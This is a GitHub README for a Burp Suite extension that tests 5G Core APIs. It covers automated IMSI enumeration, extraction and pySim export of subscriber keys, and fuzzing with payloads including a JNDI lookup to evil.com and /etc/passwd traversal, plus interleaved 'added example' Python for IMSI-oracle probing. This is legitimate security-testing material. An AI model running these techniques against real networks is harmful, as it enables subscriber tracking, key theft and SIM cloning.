https://github.com/PentHertz/5GC_API_Pentest
Professional Burp Suite extension for 5G Core security testing | Automated NF discovery | IMSI enumeration | Credential extraction | OAuth2 workflows | OpenAPI fuzzing
- Host: GitHub
- URL: https://github.com/PentHertz/5GC_API_Pentest
- Owner: PentHertz
- License: apache-2.0
- Created: 2025-11-29T22:50:52.000Z (7 months ago)
- Default Branch: main
- Last Pushed: 2025-12-01T11:45:49.000Z (6 months ago)
- Last Synced: 2026-02-03T07:21:05.510Z (4 months ago)
- Topics: 5gc, burpsuite, fuzzing, sbi, telecom, vulnerability-scanners
- Language: Python
- Homepage: https://penthertz.com
- Size: 99.6 KB
- Stars: 13
- Watchers: 1
- Forks: 3
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-telco - 5GC_API_Pentest - Burp Suite extension for 5G Core SBI security testing with automated NF discovery, IMSI enumeration, OAuth2 workflows, and OpenAPI fuzzing. Successor to 5GC_API_parse. From PentHertz. (Security / Security Exploitation/fuzzing Frameworks)
README
# 5GC API Penetration Testing Suite v1.0 - Community Edition
**Burp Suite Extension for 5G Core Network Security Testing**
---
## Overview
The **5GC API Penetration Testing Suite** is a comprehensive Burp Suite extension designed for security testing of 5G Core (5GC) networks. Developed by **Penthertz**, this tool automates the discovery, enumeration, and exploitation of vulnerabilities in 5G Service-Based Interfaces (SBI).
This tool replaces the **5GC API parser** Burp Suite extension we released a few years ago.
**Author:** Sébastien Dudek [@Penthertz](https://x.com/PentHertz)
**Company:** [Penthertz](https://penthertz.com) - RF Security & Telecommunications Security Experts
**License:** Apache License 2.0
**Version:** 1.0 Community Edition
### Quick demo
https://github.com/user-attachments/assets/8351c152-0234-4643-91ea-221a20eaabea
---
## Key Features
### Automated Attack Scenarios
- **Auto-Audit**: A one-click automated assessment that chains the steps below
- **Network Function Discovery**: Enumerate all 5GC network functions via NRF
- **IMSI Enumeration**: Discover active subscribers through UDM API
- **Credential Extraction**: Extract permanent authentication keys (K, OPc) from UDR
- **Vulnerability Detection**: Automated security issue identification
### Authentication & Security
- **OAuth2 Support**: 3GPP TS 29.510 OAuth2 workflow (manual token acquisition)
- **mTLS Configuration**: Mutual TLS authentication support (beta)
- **JWT Bearer Tokens**: Automatic token injection into requests
- **Production Safety**: Rate limiting and request delay controls
### Advanced Testing Capabilities
- **OpenAPI-based Fuzzing**: Load 3GPP YAML specs and fuzz endpoints
- **Template-based Fuzzing**: Use `$$markers$$` for precise payload injection
- **Request/Response Viewer**: Detailed HTTP traffic analysis
- **Burp Integration**: Send requests to Repeater, report to Scanner
### Rich User Interface
- **Dashboard**: Real-time statistics and quick actions
- **Configuration**: Complete 5GC network topology setup
- **Discovered Assets**: NF and IMSI tables with export
- **Credentials**: Secure credential management and export (JSON, CSV, pySim)
- **Security Issues**: Detailed vulnerability reports with request/response evidence
- **API Fuzzing**: Interactive fuzzing with payload categories
- **Activity Log**: Comprehensive logging with export
### Network Function Support
- **Core NFs**: NRF, UDM, UDR, AUSF, AMF, SMF, PCF
- **Additional NFs**: BSF, NSSF, SMSF, NEF, SCP, SEPP, UPF, and more
- **API Versioning**: Auto-detection and configuration (v1, v2, v3)
- **SCP Proxy**: Automatic detection and use of Service Communication Proxy
---
## Requirements
### Software Requirements
- **Burp Suite Professional** (recommended) or Community Edition
- **Jython 2.7** standalone JAR (not bundled with Burp Suite; set its path under Extender → Options → Python Environment)
- **Java 8+** (for Burp Suite)
### Target Environment
- **5G Core Network** (e.g., Open5GS, free5GC, commercial 5GC)
- Network access to the 5GC SBI interfaces (Open5GS defaults to plain HTTP on port 7777)
- Optional: OAuth2 server for authentication testing
- Optional: mTLS certificates for mutual authentication
### 3GPP Specifications (Optional)
- 3GPP Release 16/17/18 OpenAPI YAML files
- Available from: [jdegre/5GC_APIs](https://github.com/jdegre/5GC_APIs)
---
## Installation
### Step 1: Download the Extension
```bash
git clone https://github.com/PentHertz/5GC_API_Pentest
cd 5GC_API_Pentest
```
Note: Ensure the Jython standalone JAR is configured in Burp Suite before loading the extension.
### Step 2: Load in Burp Suite
1. Open **Burp Suite**
2. Navigate to **Extender** → **Extensions**
3. Click **Add**
4. Set **Extension Type** to **Python**
5. Select the `5GC_API_Pentest.py` file
6. Click **Next**
The extension should load successfully with output:
```
======================================================================
5GC API PENTEST SUITE v1.0 - Burp Extension (Community Edition)
Penthertz Security Research
======================================================================
[+] 5GC API Pentest Suite v1.0 (Community Edition) loaded successfully!
```
### Step 3: Access the Extension
A new tab **"5GC API Pentest"** will appear in Burp Suite.
---
## Quick Start Guide
### 1. Configure Network Function URLs
Go to the **Configuration** tab:
```
NRF URL: http://127.0.0.10:7777 (required; the rest are optional)
UDM URL: http://127.0.0.12:7777 (optional)
UDR URL: http://127.0.0.20:7777 (optional)
AUSF URL: http://127.0.0.11:7777 (optional)
AMF URL: http://127.0.0.5:7777 (optional)
SMF URL: http://127.0.0.4:7777 (optional)
```
**Tip:** The extension can auto-populate these after NF discovery.
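The auto-population mentioned above works by reading the NRF's discovery answer and turning each advertised NF service into a base URL with the API version the NF really exposes. The following standalone Python 3 script is an added example, not code from the extension: it parses a constructed `Nnrf_NFDiscovery` response laid out like the NFProfile/NFService objects of 3GPP TS 29.510 (instance IDs and addresses are made up, loopback addresses mirror the configuration above; the default ports assumed when an endpoint carries none are 80/443), derives the per-NF URLs the Configuration tab needs, and flags services that are only reachable over plaintext HTTP.

```python
"""Turn an Nnrf_NFDiscovery response into per-service base URLs.

Added example (standalone Python 3), not code from the 5GC_API_Pentest
extension. The response below is constructed to follow the NFProfile /
NFService layout of 3GPP TS 29.510; instance IDs and addresses are made up.
"""
import json

# Constructed sample for:
#   GET /nnrf-disc/v1/nf-instances?target-nf-type=UDM&requester-nf-type=AMF
SAMPLE_DISCOVERY_RESPONSE = json.dumps({
    "validityPeriod": 3600,
    "nfInstances": [
        {
            "nfInstanceId": "11111111-1111-1111-1111-111111111111",   # made up
            "nfType": "UDM",
            "nfStatus": "REGISTERED",
            "ipv4Addresses": ["127.0.0.12"],
            "nfServices": [
                {"serviceInstanceId": "1", "serviceName": "nudm-sdm", "scheme": "http",
                 "versions": [{"apiVersionInUri": "v2", "apiFullVersion": "2.0.0"}],
                 "ipEndPoints": [{"ipv4Address": "127.0.0.12", "port": 7777}]},
                {"serviceInstanceId": "2", "serviceName": "nudm-ueau", "scheme": "http",
                 "versions": [{"apiVersionInUri": "v1", "apiFullVersion": "1.0.0"}],
                 "ipEndPoints": [{"ipv4Address": "127.0.0.12", "port": 7777}]},
            ],
        },
        {   # service without ipEndPoints: fall back to the profile's addresses
            "nfInstanceId": "22222222-2222-2222-2222-222222222222",   # made up
            "nfType": "UDR",
            "nfStatus": "REGISTERED",
            "ipv4Addresses": ["127.0.0.20"],
            "nfServices": [
                {"serviceInstanceId": "1", "serviceName": "nudr-dr", "scheme": "https",
                 "versions": [{"apiVersionInUri": "v2", "apiFullVersion": "2.1.0"}],
                 "ipEndPoints": []},
            ],
        },
    ],
})

# Assumed defaults when an endpoint advertises no port.
DEFAULT_PORTS = {"http": 80, "https": 443}


def service_base_urls(discovery_json):
    """Return [(nfType, nfInstanceId, serviceName, apiVersionInUri, baseUrl)].

    baseUrl is scheme://host:port/serviceName/version: the prefix the
    Configuration tab wants per NF, with the version the NF advertises
    rather than a guessed one.
    """
    doc = json.loads(discovery_json)
    rows = []
    for nf in doc.get("nfInstances", []):
        fallback = [(h, None) for h in nf.get("ipv4Addresses", [])]
        if not fallback and nf.get("fqdn"):
            fallback = [(nf["fqdn"], None)]
        for svc in nf.get("nfServices", []):
            scheme = svc.get("scheme", "http")
            hosts = []
            for ep in svc.get("ipEndPoints") or []:
                host = ep.get("ipv4Address") or ep.get("ipv6Address")
                if host:
                    hosts.append((host, ep.get("port")))
            hosts = hosts or fallback
            for ver in svc.get("versions", []):
                v = ver.get("apiVersionInUri")
                for host, port in hosts:
                    port = port if port is not None else DEFAULT_PORTS.get(scheme, 80)
                    url = "%s://%s:%d/%s/%s" % (scheme, host, port, svc["serviceName"], v)
                    rows.append((nf.get("nfType"), nf.get("nfInstanceId"), svc["serviceName"], v, url))
    return rows


def nf_url_config(rows):
    """Collapse rows to {nfType: scheme://host:port}, one entry per NF type,
    i.e. the 'NRF URL / UDM URL / ...' fields of the Configuration tab."""
    config = {}
    for nf_type, _, _, _, url in rows:
        config.setdefault(nf_type, "/".join(url.split("/")[:3]))
    return config


def plaintext_services(rows):
    """Services advertised over http://, i.e. SBI traffic without TLS
    (TS 33.501 requires TLS on the SBI unless protection is provided by other means)."""
    return [url for _, _, _, _, url in rows if url.startswith("http://")]
```

In practice feed it the JSON body captured in Burp for `GET /nnrf-disc/v1/nf-instances?...` (or `/nnrf-nfm/v1/nf-instances` when the NRF exposes the management API unauthenticated); the `apiVersionInUri` values it extracts are what "Auto-Detect Versions" has to agree with.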
### 2. Configure IMSI Range
```
Base IMSI: 999700000000
Start Range: 1
End Range: 100
Workers: 10
```
### 3. Run Auto-Audit
Go to the **Dashboard** tab and click:
**Auto-Audit**
This will automatically:
1. Discover all Network Functions
2. Enumerate valid IMSIs
3. Extract authentication credentials
4. Detect security vulnerabilities
### 4. Review Results
- **Discovered Assets**: View NFs and IMSIs
- **Credentials**: Extracted K/OPc keys
- **Security Issues**: Detailed vulnerability reports
---
## OAuth2 Configuration (3GPP TS 29.510)
### Manual Token Workflow
The extension implements the **3GPP TS 29.510** OAuth2 specification with a **manual token acquisition workflow**.
#### Step 1: Configure OAuth2 Parameters
Go to **Configuration** → **OAuth2 / JWT Authentication**:
```
NRF OAuth2 URL: http://127.0.0.10:7777/oauth2/token
NF Instance ID: 12345678-1234-1234-1234-123456789abc
NF Type: AMF
Target NF Type: (optional)
Scope: nnrf-disc nnrf-nfm
```
#### Step 2: Generate OAuth2 Request
Click **"Generate OAuth2 Request"**
The extension will display:
```bash
# CURL COMMAND
curl -X POST 'http://127.0.0.10:7777/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'grant_type=client_credentials&nfInstanceId=...'
```
#### Step 3: Run Request Manually
**Option A:** Copy curl command and run in terminal
**Option B:** Click **"Send to Burp Repeater"** and execute
#### Step 4: Activate Token
1. Copy the `access_token` from the JSON response:
```json
{
"access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...",
"token_type": "Bearer",
"expires_in": 3600
}
```
2. Paste the token into **"Access Token"** field
3. Click **"Activate Token"** (green button)
#### Step 5: Enable OAuth
Check: **Enable OAuth2 Bearer Token for all requests**
All subsequent requests will include:
```
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
```
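The five steps above produce a form-encoded `AccessTokenReq` and hand back a JWT that the extension then injects as a bearer header; what they do not show is what a tester should read out of that token before trusting it (Use Case 4 below compares results with and without it). The following standalone Python 3 script is an added example, not the extension's code: it builds the TS 29.510 request body, decodes the token, and lists the findings worth recording (alg=none, scope wider than requested, missing or wrong `aud`, missing or long `exp`). The NF instance ID is the one from the configuration example above; the NRF instance ID and HMAC key are constructed, and HS256 is used only so the sample token verifies offline (a real NRF signs with RS256/ES256 and the client would verify against the NRF's public key instead).

```python
"""Build a TS 29.510 client_credentials token request and inspect the token.

Added example (standalone Python 3), not the extension's code. NRF ID,
key and claims are constructed; HS256 stands in for the NRF's RS256/ES256.
"""
import base64
import hashlib
import hmac
import json
import time
from urllib.parse import urlencode

NF_INSTANCE_ID = "12345678-1234-1234-1234-123456789abc"
NRF_INSTANCE_ID = "9d1f8c2a-0000-4000-8000-000000000001"   # constructed
SAMPLE_KEY = b"nrf-demo-signing-key"                      # constructed


def token_request_body(nf_instance_id, nf_type, scope, target_nf_type=None):
    """Form body of the AccessTokenReq posted to /oauth2/token (TS 29.510)."""
    params = {"grant_type": "client_credentials", "nfInstanceId": nf_instance_id,
              "nfType": nf_type, "scope": scope}
    if target_nf_type:
        params["targetNfType"] = target_nf_type
    return urlencode(params)


def bearer_header(token):
    """Header line injected into every request once the token is activated."""
    return "Authorization: Bearer " + token


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_sample_token(claims, key, alg="HS256"):
    """Mint a compact JWS for offline testing (HS256, or alg=none for the unsigned case)."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = "%s.%s" % (_b64url(json.dumps(header, separators=(",", ":")).encode()),
                               _b64url(json.dumps(claims, separators=(",", ":")).encode()))
    sig = b"" if alg == "none" else hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_jwt(token):
    """Split a compact JWS into (header, claims, signature) WITHOUT verifying it."""
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s)


def verify_hs256(token, key):
    """Constant-time HS256 check; False for any other alg, including 'none'."""
    h, p, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != "HS256":
        return False
    expected = hmac.new(key, ("%s.%s" % (h, p)).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(s))


def token_findings(token, requested_scope, expected_aud, now=None):
    """Observations to record about an NRF-issued token (claims per TS 29.510 AccessTokenClaims)."""
    now = time.time() if now is None else now
    header, claims, _ = decode_jwt(token)
    findings = []
    if str(header.get("alg", "")).lower() == "none":
        findings.append("alg=none: token carries no signature")
    extra = set(claims.get("scope", "").split()) - set(requested_scope.split())
    if extra:
        findings.append("scope wider than requested: " + " ".join(sorted(extra)))
    aud = claims.get("aud")
    if aud is None:
        findings.append("no aud claim: token not bound to a target NF")
    elif expected_aud not in (aud if isinstance(aud, list) else [aud]):
        findings.append("aud %r does not name %s" % (aud, expected_aud))
    exp = claims.get("exp")
    if exp is None:
        findings.append("no exp claim: token never expires")
    elif exp < now:
        findings.append("token expired")
    elif exp - now > 24 * 3600:
        findings.append("token lifetime exceeds 24h")
    return findings
```

Paste the `access_token` returned by the curl command into `token_findings` with the scope you asked for and the NF type you intend to call; a token that the target NF accepts despite a wrong `aud` or an inflated scope is itself a finding, separate from whether the NF enforces authentication at all.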
---
## API Fuzzing
### Using 3GPP OpenAPI Specifications
#### Step 1: Load OpenAPI Directory
1. Download 3GPP specs:
```bash
git clone https://github.com/jdegre/5GC_APIs.git
```
2. Run `5GC_API_YAML_file_corrector_for_SnakeYAML.py` against this repository to fix unicode and other issues; otherwise some YAML files will not parse correctly
3. In Burp Suite, go to the **API Fuzzing** tab and click **"Load API Directory..."**
4. Select the `5GC_APIs/` folder
The extension will parse all YAML files and display available APIs.
#### Step 2: Select API and Endpoint
1. **Select API**: Click on an API (e.g., "Nudm_SDM")
2. **Select Endpoint**: Choose an endpoint (e.g., `GET /nudm-sdm/v2/imsi-{imsi}/am-data`)
A **request template** will be generated with `$$markers$$`:
```http
GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1
Host: $$host$$
Content-Type: application/json
Accept: application/json
```
Edit the template freely: any value you wrap in `$$param$$` markers becomes an injection point for the payloads.
#### Step 3: Configure Fuzzing
**Base URL:**
```
http://127.0.0.12:7777
```
**Threads:** 5
**Delay:** 100ms
#### Step 4: Load Payloads
**Option A:** Load from file (one payload per line)
**Option B:** Load by category:
- SQL Injection
- XSS (Cross-Site Scripting)
- Path Traversal
- 5GC Specific - IMSI
**Option C:** Manual entry:
```
' OR '1'='1
../../../etc/passwd
999700000000001
${jndi:ldap://evil.com/a}
```
#### Step 5: Start Fuzzing
Click **"Start Fuzzing"**
The extension will:
1. Replace each `$$marker$$` (for example `$$param$$`) with the payloads in turn
2. Send requests and analyze responses
3. Detect anomalies (errors, injections, large responses)
4. Display results in real-time
#### Step 6: Review Results
- **Click row** to view full request/response
- **Right-click** → **"Send to Repeater"** for further testing
- **Export results** for reporting
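Steps 2 and 5 above describe the two halves of the fuzzer: expanding the `$$marker$$` template with payloads and deciding which responses are anomalous. The following standalone Python 3 script is an added example, not the extension's fuzzer: it renders the Nudm_SDM template shown in Step 2, refuses to send a request with an unfilled marker, percent-encodes path payloads by default so a space or `#` does not break the request line, and compares each fuzzed response against a baseline (status change, 5xx, size deviation, error-string disclosure, slow response). The baseline and fuzzed responses are constructed, and the anomaly rules are a starting set of heuristics rather than the extension's exact logic.

```python
"""Expand a $$marker$$ request template and triage fuzzing responses.

Added example (standalone Python 3); not the extension's fuzzer. Template
is the README's Nudm_SDM one; responses below are constructed.
"""
import re
from urllib.parse import quote

MARKER = re.compile(r"\$\$(\w+)\$\$")

TEMPLATE = ("GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1\r\n"
            "Host: $$host$$\r\n"
            "Content-Type: application/json\r\n"
            "Accept: application/json\r\n\r\n")

# Constructed payload set, mirroring the manual-entry list above
PAYLOADS = ["' OR '1'='1", "../../../etc/passwd", "999700000000001", "${jndi:ldap://evil.com/a}"]

# Substrings that usually mean the backend leaked an error; first match wins
ERROR_SIGNATURES = ("Traceback (most recent call last)", "MongoError", "MongoServerError",
                    "SQL syntax", "SQLSTATE", "java.lang.", "NullPointerException", "stack trace")


def markers(template):
    """Marker names present in the template, sorted, without the $$ delimiters."""
    return sorted(set(MARKER.findall(template)))


def render(template, values):
    """Fill every marker; refuse to build a request with a marker left in place."""
    missing = [m for m in markers(template) if m not in values]
    if missing:
        raise KeyError("unfilled markers: " + ", ".join(missing))
    return MARKER.sub(lambda m: values[m.group(1)], template)


def fuzz_cases(template, fixed, fuzz_marker, payloads, url_encode=True):
    """Yield (payload, request) with one marker fuzzed and the others fixed."""
    for payload in payloads:
        values = dict(fixed)
        values[fuzz_marker] = quote(payload, safe="") if url_encode else payload
        yield payload, render(template, values)


def detect_anomalies(baseline, result):
    """Reasons to flag a fuzzed response next to the baseline for the same endpoint.

    Both are dicts with keys status, body, elapsed (seconds). Empty list means
    nothing stood out.
    """
    reasons = []
    if result["status"] >= 500:
        reasons.append("server error %d" % result["status"])
    elif result["status"] != baseline["status"]:
        reasons.append("status %d -> %d" % (baseline["status"], result["status"]))
    base_len, res_len = len(baseline["body"]), len(result["body"])
    if abs(res_len - base_len) > max(200, base_len // 2):
        reasons.append("response size %d vs baseline %d" % (res_len, base_len))
    lowered = result["body"].lower()
    for sig in ERROR_SIGNATURES:
        if sig.lower() in lowered:
            reasons.append("error disclosure: " + sig)
            break
    if result["elapsed"] > 5 * max(baseline["elapsed"], 0.1):
        reasons.append("slow response (%.2fs): possible time-based injection" % result["elapsed"])
    return reasons


# Constructed responses: UDM answer for an unknown but well-formed IMSI (baseline)
# and for the SQL payload
BASELINE = {"status": 404, "elapsed": 0.04,
            "body": '{"status":404,"cause":"USER_NOT_FOUND","detail":"no such subscriber"}'}
FUZZED = {"status": 500, "elapsed": 0.06,
          "body": '{"status":500,"detail":"MongoError: unterminated quoted string"}'}
```

Take the baseline from a request whose fuzzed position holds a benign value of the same shape (a syntactically valid but unassigned IMSI), not from an empty field; otherwise every payload differs from the baseline and the size and status rules flag everything.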
---
## Export Capabilities
### Credentials Export
**JSON Format:**
```json
{
"timestamp": "2025-01-15 14:30:00",
"total_credentials": 50,
"credentials": [
{
"imsi": "999700000000001",
"k": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"opc": "E8ED289DEBA952E4283B54E88E6183CA",
"sqn": "000000000001",
"amf": "8000"
}
]
}
```
**CSV Format:**
```csv
IMSI,K,OPc,SQN,AMF,Timestamp
999700000000001,465B5CE8...,E8ED289D...,000000000001,8000,2025-01-15 14:30:00
```
**pySim Format** (for SIM card programming):
```json
[
{
"IMSI": "999700000000001",
"Ki": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"OPc": "E8ED289DEBA952E4283B54E88E6183CA",
"ADM1": "00000000",
"ICCID": "8988211000000000001"
}
]
```
### Security Report Export
Comprehensive JSON report including:
- Network Functions discovered
- IMSIs enumerated
- Credentials extracted
- Security issues with request/response evidence
- Configuration snapshot
---
## Advanced Configuration
### Production Safety Settings
Enable **PRODUCTION MODE** for safe testing:
```
[x] PRODUCTION MODE (enables safety features)
Max Requests/Second: 10
Request Delay (ms): 500
Max Concurrent Threads: 3
```
### Quick Presets
**Stealth Mode (Safe):**
- 3 workers, 5 req/s, 500ms delay
- IMSI range: 1-100
- Best for: Production testing
**Balanced Mode (Normal):**
- 10 workers, 20 req/s, 100ms delay
- IMSI range: 1-1000
- Best for: Lab testing
**Aggressive Mode (Fast):**
- 30 workers, 100 req/s, 10ms delay
- IMSI range: 1-10000
- **Lab environments only!**
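The three safety knobs interact: the request delay sets a floor on the gap between sends, the requests-per-second cap bounds the sustained rate, and the thread limit bounds concurrency, so one of them, not all three, ends up governing a preset. The following standalone Python 3 class is an added example, not the extension's own scheduler, showing one way to enforce all three together with a token bucket; it assumes the delay applies between any two sends (not per worker) and takes injectable clock and sleep functions so the pacing can be computed without actually waiting.

```python
"""Token-bucket throttle for the Production Safety knobs.

Added example (standalone Python 3), not the extension's own scheduler.
'Max Requests/Second', 'Request Delay (ms)' and 'Max Concurrent Threads'
map onto the constructor arguments. The delay is assumed to be global.
"""
import threading
import time


class ProductionThrottle:
    """Bounds the request rate, enforces a minimum gap between sends and caps
    concurrency. Safe to share across worker threads."""

    def __init__(self, max_rps, delay_ms, max_threads, clock=time.monotonic, sleep=time.sleep):
        self.rate = float(max_rps)
        self.capacity = float(max_rps)          # burst at most one second's worth
        self.tokens = self.capacity
        self.min_gap = delay_ms / 1000.0
        self.clock, self.sleep = clock, sleep
        self.last_refill = clock()
        self.next_slot = clock()                 # earliest moment the next request may go out
        self.lock = threading.Lock()
        self.slots = threading.BoundedSemaphore(max_threads)

    def _refill(self, now):
        self.tokens = min(self.capacity, self.tokens + (now - self.last_refill) * self.rate)
        self.last_refill = now

    def wait_time(self):
        """Reserve the next send and return how long the caller must sleep first."""
        with self.lock:
            now = self.clock()
            self._refill(now)
            # when a token will exist, or now if one already does
            send_at = now if self.tokens >= 1 else now + (1 - self.tokens) / self.rate
            send_at = max(send_at, self.next_slot)  # honour the fixed delay
            self.tokens -= 1                        # may go negative: the wait repays the debt
            self.next_slot = send_at + self.min_gap
            return send_at - now

    def acquire(self):
        self.slots.acquire()                     # block until a worker slot is free
        self.sleep(self.wait_time())

    def release(self):
        self.slots.release()

    def __enter__(self):
        self.acquire()
        return self

    def __exit__(self, *exc):
        self.release()
        return False


def planned_schedule(max_rps, delay_ms, n):
    """Send offsets (seconds) of n back-to-back requests under the given settings,
    computed against a frozen clock: a way to sanity-check a preset before running it."""
    frozen = [0.0]
    throttle = ProductionThrottle(max_rps, delay_ms, 1, clock=lambda: frozen[0], sleep=lambda s: None)
    return [throttle.wait_time() for _ in range(n)]
```

Worker threads wrap each send in `with throttle:`. Running `planned_schedule(5, 500, 4)` for the Stealth preset gives sends at 0, 0.5, 1.0 and 1.5 s: the 500 ms delay, not the 5 req/s cap, is what bounds it, so raising the cap alone would change nothing on a production core.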
### API Version Configuration
Auto-detect, or manually configure:
```
NRF API Version: v1
UDM API Version: v2
UDR API Version: v2
AUSF API Version: v1
```
Click **"Auto-Detect Versions"** to automatically identify supported versions.
---
## Common Use Cases
### Use Case 1: Unauthenticated NF Discovery
**Scenario:** Test if NRF allows unauthenticated network function enumeration
**Steps:**
1. Configure NRF URL
2. Dashboard → **"Discover NFs"**
3. Review **Discovered Assets** tab
4. Check **Security Issues** for "Missing Authentication" vulnerability
**Expected Finding:** High severity issue if authentication is not required
---
### Use Case 2: IMSI Privacy Violation
**Scenario:** Test if UDM allows IMSI enumeration without authentication
**Steps:**
1. Configure UDM URL and IMSI range
2. Dashboard → **"Enumerate IMSIs"**
3. Review discovered IMSIs
4. Check for "Privacy Violation" security issue
**Expected Finding:** High severity if sequential IMSI testing succeeds
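The enumeration behind this use case (and behind Quick Start step 2, where the IMSI range is configured) is an oracle attack: the UDM answers differently for an existing SUPI and for an unknown one, so a sequential sweep of `imsi-<base><counter>` maps the subscriber base. The following standalone Python 3 script is an added example, not the extension's enumerator: it builds the 15-digit candidates from the base/range fields, refuses a range that does not fit in the remaining digits, classifies each UDM answer, and states the "Privacy Violation" condition. The UDM responses are constructed, with 404 causes in the ProblemDetails style of 3GPP TS 29.503.

```python
"""IMSI candidate generation and UDM response triage for Nudm_SDM probing.

Added example (standalone Python 3), not the extension's own enumerator.
Base IMSI and range mirror the README's Quick Start values; the UDM
responses are constructed.
"""
import json


def imsi_candidates(base_imsi, start, end):
    """Yield 15-digit IMSIs: base prefix plus a zero-padded counter, the way the
    'Base IMSI / Start Range / End Range' fields are combined."""
    if not base_imsi.isdigit():
        raise ValueError("base IMSI must be decimal digits (MCC+MNC+MSIN prefix)")
    width = 15 - len(base_imsi)
    if width <= 0:
        raise ValueError("base IMSI leaves no digits for the counter")
    if start < 0 or end >= 10 ** width:
        raise ValueError("range %d-%d does not fit in %d digit(s); shorten the base IMSI"
                         % (start, end, width))
    for n in range(start, end + 1):
        yield base_imsi + str(n).zfill(width)


def am_data_path(imsi, version="v2"):
    """The Nudm_SDM resource probed for each candidate."""
    return "/nudm-sdm/%s/imsi-%s/am-data" % (version, imsi)


def classify(status, body):
    """valid / unknown / auth_required / other, from one UDM response.

    200 means the SUPI exists; 404 with a USER_NOT_FOUND or DATA_NOT_FOUND
    cause means it does not; 401/403 means the UDM is enforcing OAuth2 or
    mTLS, which is what a hardened core should answer an unknown client.
    """
    if status == 200:
        return "valid"
    if status in (401, 403):
        return "auth_required"
    if status == 404:
        try:
            doc = json.loads(body)
        except ValueError:
            doc = None
        cause = doc.get("cause") if isinstance(doc, dict) else None
        if cause in ("USER_NOT_FOUND", "DATA_NOT_FOUND"):
            return "unknown"
    return "other"


def triage(base_imsi, start, end, fetch):
    """Run the candidates through fetch(path) -> (status, body) and bucket them."""
    buckets = {"valid": [], "unknown": [], "auth_required": [], "other": []}
    for imsi in imsi_candidates(base_imsi, start, end):
        status, body = fetch(am_data_path(imsi))
        buckets[classify(status, body)].append(imsi)
    return buckets


def privacy_finding(buckets):
    """The 'Privacy Violation' condition: the UDM distinguishes existing from
    non-existing subscribers without demanding authentication."""
    if buckets["auth_required"]:
        return None
    if buckets["valid"] and buckets["unknown"]:
        return "High: UDM acts as an IMSI existence oracle (%d valid of %d probed)" % (
            len(buckets["valid"]), sum(len(v) for v in buckets.values()))
    return None


# Constructed canned responses standing in for a lab UDM
_CANNED = {
    "/nudm-sdm/v2/imsi-999700000000001/am-data": (200, json.dumps(
        {"gpsis": ["msisdn-0000000001"], "subscribedUeAmbr": {"uplink": "1 Gbps", "downlink": "1 Gbps"}})),
    "/nudm-sdm/v2/imsi-999700000000003/am-data": (200, json.dumps({"gpsis": ["msisdn-0000000003"]})),
}


def canned_fetch(path):
    """Offline stand-in for the HTTP call: unknown SUPIs get a TS 29.503-style 404."""
    return _CANNED.get(path, (404, json.dumps({"status": 404, "cause": "USER_NOT_FOUND"})))
```

Note the range check: with the 12-digit base above only three counter digits remain, so the Aggressive preset's 1-10000 range cannot be expressed without shortening the base IMSI, which the extension's fields do not make obvious.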
---
### Use Case 3: Credential Exposure
**Scenario:** Test if UDR exposes permanent authentication keys
**Steps:**
1. Run IMSI enumeration first
2. Dashboard → **"Extract Credentials"**
3. Review **Credentials** tab for K/OPc values
4. Export credentials for offline analysis
**Expected Finding:** Critical vulnerability if K/OPc are accessible without authentication
---
### Use Case 4: OAuth2 Implementation Testing
**Scenario:** Test OAuth2 token workflow and validation
**Steps:**
1. Configure OAuth2 parameters
2. Generate and execute token request
3. Activate token
4. Run attacks with OAuth enabled
5. Compare results with/without authentication
**Expected Finding:** Proper authentication should block unauthorized access
---
### Use Case 5: API Fuzzing for Injection
**Scenario:** Test for SQL/NoSQL injection vulnerabilities
**Steps:**
1. Load 3GPP OpenAPI specs
2. Select UDR authentication endpoint
3. Load "SQL Injection" payload category
4. Start fuzzing
5. Review anomalies (500 errors, error disclosure)
**Expected Finding:** Properly sanitized inputs should not produce errors
---
## Additional Resources
- [Open5GS Documentation](https://open5gs.org/open5gs/docs/)
- [free5GC Documentation](https://free5gc.org/)
- [3GPP Specifications](https://www.3gpp.org/specifications)
- [Penthertz Blog](https://penthertz.com/blog)
---
## License
```
Copyright 2025 Sébastien Dudek / Penthertz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
---
## Acknowledgments
- **Open5GS** team for open-source 5G Core implementation
- **PortSwigger** for Burp Suite framework
- **jdegre** for maintaining 5GC_APIs repository
- The **5G security research community**